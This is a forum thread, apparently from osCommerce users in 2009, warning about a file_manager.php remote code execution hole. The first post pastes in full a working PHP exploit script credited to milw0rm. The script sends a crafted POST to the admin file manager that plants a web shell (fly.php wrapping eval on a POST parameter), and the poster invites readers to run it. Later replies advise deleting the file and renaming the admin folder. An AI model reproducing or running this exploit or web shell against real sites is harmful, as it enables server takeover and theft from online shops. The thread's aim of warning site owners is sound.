2 replies to this topic

[Pipeloops]

Hi all,

recently a couple of sites (including my own) have been hacked using a new exploit. Please have a look at this thread http://forums.oscommerce.com/index.php?showtopic=344272. The attacker installed a backdoor (c99madShell) and also added a stub into each and every php file on the site that would execute some code (don't know yet for what purpose) each time any page on your site is called up.

This hack uses a recently discovered code injection exploit with file_manager.php. PLEASE NOTE: None of the measures in the "Secure your Site" thread prevent this attack! On my site all contributions mentioned in the thread are installed and active, and all folder and file attributes are set correctly, still I got hacked. And I just tried the exploit with the script (see below) again, and it still works when I reactivate the file manager.

There is only ONE method to prevent this:
Rename or delte file_manager.php, so the attacker does not find it!!!

Here is the attack script. If you think you are safe, just insert your hostname in $host, put this file on your server (or run it locally in xampp), and see what you get when you visit the link it shows after running.

I would appreciate if a mod can make this sticky, so it gets noticed by everybody!

Thanks
Reiner

<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
	echo '[~]No response from'.$host;
	die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]

[jackanderson]

Thanks for the heads up.. Really appreciate it..

[Giovanna]

This has been discussed already in july! (http://forums.oscommerce.com/index.php?showtopic=340995) removing the file_manager.php is a beginning as it shouldnt be used to edit your site anyway. If you see the code you posted it assumes the admin path is www.yoursite.com\admin. You are still vunerable if you leave your admin site as admin as they will find another way to hack in. So please everyone, folow the instructions in the link here and rename your admin.

Edited by Giovanna, 11 September 2009, 12:20.